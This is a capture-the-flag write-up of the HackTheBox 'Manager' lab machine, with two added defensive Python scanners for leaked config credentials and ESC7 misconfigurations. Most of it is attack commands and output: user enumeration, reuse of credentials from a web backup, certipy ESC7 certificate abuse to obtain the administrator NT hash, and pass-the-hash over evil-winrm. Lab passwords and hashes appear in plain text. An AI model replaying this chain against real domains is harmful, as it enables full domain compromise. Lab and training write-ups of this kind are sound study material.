On Manager we enumerated users through their SIDs, which gave us access to MSSQL; from there, enumeration with xp_dirtree revealed a backup of the website, and inside it we found credentials that gave us access over WinRM. Finally we escalated privileges by exploiting a vulnerability in ADCS.
# Nmap 7.94 scan initiated Thu Nov 9 17:06:30 2023 as: nmap -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49687,49688,49689,49726,55087 -Pn -sV -sC -oN nmap_scan 10.10.11.236
Nmap scan report for 10.10.11.236
Host is up (0.073s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-10 05:06:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-11-10T05:09:40+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-11-10T05:09:40+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-11-10T04:52:27
|_Not valid after: 2053-11-10T04:52:27
|_ssl-date: 2023-11-10T05:09:40+00:00; +7h00m00s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-11-10T05:09:40+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-11-10T05:09:40+00:00; +7h00m01s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49687/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49726/tcp open msrpc Microsoft Windows RPC
55087/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-11-10T05:09:01
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 9 17:09:40 2023 -- 1 IP address (1 host up) scanned in 189.78 seconds
Web Site
The site's response headers show Microsoft IIS 10.
π ~/htb/manager ❯ rpcclient -U "" -N 10.10.11.236
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
Enum Users
We attempted user enumeration through SIDs, in this case using the 'guest' account with an empty password; it revealed several users, from which we built a wordlist.
Using the usernames as passwords with crackmapexec over SMB, we found that the user Operator can authenticate and list the SMB shares.
π ~/htb/manager/website ❯ ls -lah
total 68K
drwxr-xr-x 5 kali kali 4.0K Nov 9 19:28 .
drwxr-xr-x 3 kali kali 4.0K Nov 9 19:28 ..
-rw-r--r-- 1 kali kali 5.3K Jul 27 05:32 about.html
-rw-r--r-- 1 kali kali 5.2K Jul 27 05:32 contact.html
drwxr-xr-x 2 kali kali 4.0K Nov 9 19:28 css
drwxr-xr-x 2 kali kali 4.0K Nov 9 19:28 images
-rw-r--r-- 1 kali kali 18K Jul 27 05:32 index.html
drwxr-xr-x 2 kali kali 4.0K Nov 9 19:28 js
-rw-r--r-- 1 kali kali 698 Jul 27 05:35 .old-conf.xml
-rw-r--r-- 1 kali kali 7.8K Jul 27 05:32 service.html
π ~/htb/manager/website ❯ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
π ~/htb/manager/website ❯
We check them over WinRM and find that the credentials work.
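The backup above shipped an LDAP bind password in plain text inside a dotfile in the webroot. As an added example (not part of the original writeup), this Python scanner walks a webroot, dotfiles included, parses every XML or backup-looking file and reports credential-bearing elements with the value redacted; the sample config is constructed from the .old-conf.xml layout shown above with the password replaced by a placeholder.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
# Constructed sample modelled on the .old-conf.xml found in the site backup;
# the real password is replaced by a placeholder.
SAMPLE_CONF = """<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
    <access-user>
      <user>raven@manager.htb</user>
      <password>PLACEHOLDER_SECRET</password>
    </access-user>
  </server>
</ldap-conf>
"""
# Element names that usually carry a credential in XML configs.
SECRET_TAGS = {"password", "passwd", "pwd", "secret", "bindpassword"}

def scan_xml(path):
    """Return (path, element path, sibling <user>, redacted secret) per credential element."""
    findings = []
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return findings  # not well-formed XML: nothing for this parser to report
    for parent in root.iter():
        for child in parent:
            value = (child.text or "").strip()
            if child.tag.lower() in SECRET_TAGS and value:
                user_el = parent.find("user")
                user = (user_el.text or "").strip() if user_el is not None else ""
                redacted = value[:2] + "*" * (len(value) - 2)  # never print the secret itself
                findings.append((path, f"{parent.tag}/{child.tag}", user, redacted))
    return findings

def scan_tree(root_dir):
    # os.walk lists dotfiles too, so a forgotten .old-conf.xml is not skipped
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name.lower().endswith((".xml", ".config", ".bak", ".old")):
                findings.extend(scan_xml(os.path.join(dirpath, name)))
    return findings

def demo():
    # Write the constructed config into a temporary webroot and scan it.
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, ".old-conf.xml"), "w", encoding="utf-8") as f:
            f.write(SAMPLE_CONF)
        return [(ep, user, secret) for _, ep, user, secret in scan_tree(d)]
```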
*Evil-WinRM* PS C:\Users\Raven\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=============================================================
manager\raven S-1-5-21-4078382237-1492182817-2568127209-1116
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=====================================================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================================================
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\Raven\Desktop>
Certipy
We run certipy to check whether any template is vulnerable; it reports ESC7, where raven holds dangerous permissions on the CA.
π ~/htb/manager ❯ certipy-ad find -vulnerable -u raven@manager.htb -p "R4v3nBe5tD3veloP3r\!123" -dc-ip 10.10.11.236 -stdout
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0 CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
π ~/htb/manager ❯
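ESC7 is exactly what the Permissions block above shows: a regular user (Raven) holding ManageCa on the CA alongside the admin groups. As an added audit example (not part of the original writeup or of certipy), this Python snippet parses that block, using a constructed copy of the output above, and flags any principal outside the expected admin groups that holds ManageCa or ManageCertificates; the allow-list of admin groups is an assumption for this demo.

```python
import re

# Constructed sample: the Permissions section of certipy's CA enumeration above.
CERTIPY_CA_BLOCK = """\
    Permissions
      Owner                           : MANAGER.HTB\\Administrators
      Access Rights
        Enroll                        : MANAGER.HTB\\Operator
                                        MANAGER.HTB\\Authenticated Users
                                        MANAGER.HTB\\Raven
        ManageCa                      : MANAGER.HTB\\Administrators
                                        MANAGER.HTB\\Domain Admins
                                        MANAGER.HTB\\Enterprise Admins
                                        MANAGER.HTB\\Raven
        ManageCertificates            : MANAGER.HTB\\Administrators
                                        MANAGER.HTB\\Domain Admins
                                        MANAGER.HTB\\Enterprise Admins
"""

# Assumed allow-list: principals expected to manage the CA; anything else is a finding.
EXPECTED_ADMINS = {"Administrators", "Domain Admins", "Enterprise Admins"}
# The two CA rights whose misassignment constitutes ESC7.
DANGEROUS_RIGHTS = {"ManageCa", "ManageCertificates"}

def parse_access_rights(block):
    """Map each access right to the principals holding it, continuation lines included."""
    rights, current = {}, None
    for line in block.splitlines():
        m = re.match(r"^\s*([A-Za-z]+)\s*:\s*(\S.*)$", line)
        if m and m.group(1) != "Owner":
            current = m.group(1)
            rights[current] = [m.group(2).strip()]
        elif current and line.strip() and ":" not in line:
            rights[current].append(line.strip())  # principal listed under the previous right
    return rights

def esc7_findings(block):
    """Return (right, principal) pairs where a non-admin principal can manage the CA."""
    findings = []
    for right, principals in parse_access_rights(block).items():
        if right not in DANGEROUS_RIGHTS:
            continue
        for principal in principals:
            name = principal.split("\\", 1)[-1]  # drop the DOMAIN\ prefix
            if name not in EXPECTED_ADMINS:
                findings.append((right, principal))
    return findings
```

The remediation is the inverse of the finding: remove ManageCa and ManageCertificates from every principal the function reports.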
ESC7
To exploit this vulnerability we need the SubCA template enabled. We do this by first adding raven as a new "officer" on the Certificate Authority; once that is done, we enable the SubCA template with Raven as officer.
π ~/htb/manager ❯ certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password "R4v3nBe5tD3veloP3r\!123"
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
π ~/htb/manager ❯ certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password "R4v3nBe5tD3veloP3r\!123"
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
π ~/htb/manager ❯
Using the SubCA template we request a certificate. The error is expected; we only need the request ID, which we then use to issue the certificate for that request.
π ~/htb/manager ❯ certipy-ad req -username raven@manager.htb -password "R4v3nBe5tD3veloP3r\!123" -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -dc-ip 10.10.11.236
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 16
Would you like to save the private key? (y/N) y
[*] Saved private key to 16.key
[-] Failed to request certificate
π ~/htb/manager ❯ certipy-ad ca -ca 'manager-DC01-CA' -issue-request 16 -username raven@manager.htb -password "R4v3nBe5tD3veloP3r\!123"
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
π ~/htb/manager ❯
We can now retrieve the certificate using the previous request ID.
π ~/htb/manager ❯ certipy-ad req -username raven@manager.htb -password "R4v3nBe5tD3veloP3r\!123" -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 16 -dc-ip 10.10.11.236
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Retrieving certificate with ID 16
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '16.key'
[*] Saved certificate and private key to 'administrator.pfx'
π ~/htb/manager ❯
We synchronize our clock with the machine's and finally authenticate as administrator, which gives us this user's NTLM hash.
π ~/htb/manager ❯ sudo ntpdate 10.10.11.236
2023-11-10 02:52:30.507066 (-0500) +25200.289340 +/- 0.033445 10.10.11.236 s1 no-leap
CLOCK: time stepped by 25200.289340
π ~/htb/manager ❯ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
π ~/htb/manager ❯
Shell
Using this hash over WinRM we gain access and read the root.txt flag.
π ~/htb/manager ❯ evil-winrm -i manager.htb -u administrator -H ae5064c2f62317332c88629e025924ef
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
manager\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
8e9ae1d9eb2a9bfdeb3d33d064e7ec25
*Evil-WinRM* PS C:\Users\Administrator\Documents>
We could also run impacket's secretsdump to obtain the hashes.